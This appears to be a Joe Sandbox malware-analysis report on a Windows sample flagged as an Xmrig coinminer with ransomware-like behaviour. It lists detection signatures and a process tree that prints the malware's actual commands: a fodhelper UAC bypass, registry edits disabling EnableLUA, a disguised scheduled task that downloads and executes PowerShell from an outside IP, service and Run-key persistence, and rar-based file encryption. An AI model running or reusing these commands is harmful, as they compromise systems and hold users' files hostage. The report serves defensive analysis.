Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jxatBamQnK

Overview

General Information

Sample Name:jxatBamQnK (renamed file extension from none to exe)
Analysis ID:683425
MD5:c44c67fbbd78af44e4e75787e636e1fe
SHA1:a72928ef28c93893cf510937e6c4c7336f21c50c
SHA256:55bc3c6946fe78077bea015b9e93414db807495f353a88b2aeb6d9315cb31322
Tags:CoinMinerexetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Schedule system process
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Sigma detected: Powershell Download and Execute IEX
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
Uses cmd line tools excessively to alter registry or file data
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Powershell drops PE file
Drops script or batch files to the startup folder
Uses schtasks.exe or at.exe to add and modify task schedules
Creates an autostart registry key pointing to binary in C:\Windows
Suspicious powershell command line found
Machine Learning detection for dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • jxatBamQnK.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\jxatBamQnK.exe" MD5: C44C67FBBD78AF44E4E75787E636E1FE)
    • cmd.exe (PID: 6392 cmdline: cmd.exe /C fodhelper.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • fodhelper.exe (PID: 6436 cmdline: fodhelper.exe MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
        • reg.exe (PID: 6484 cmdline: "reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: E3DACF0B31841FA02064B4457D44B357)
          • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6816 cmdline: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6828 cmdline: schtasks /run /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6844 cmdline: sc create msupdate binpath= C:\Windows\Temp\C:\Windows\Temp\daemon.exe MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6912 cmdline: sc description msupdate "Just For Test" MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 7028 cmdline: sc config msupdate start= auto MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 7060 cmdline: net start msupdate MD5: 15534275EDAABC58159DD0F8607A71E5)
      • conhost.exe (PID: 3244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5716 cmdline: C:\Windows\system32\net1 start msupdate MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • reg.exe (PID: 7164 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • reg.exe (PID: 3852 cmdline: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • reg.exe (PID: 4040 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 6424 cmdline: wmic process get executablepath MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • findstr.exe (PID: 4584 cmdline: findstr encrypt.exe MD5: BCC8F29B929DABF5489C9BE6587FF66D)
      • conhost.exe (PID: 2952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 1152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • encrypt.exe (PID: 6660 cmdline: C:\Windows\Temp\encrypt.exe MD5: 9996CC802C43F6FFE4065A514585C209)
      • cmd.exe (PID: 1880 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)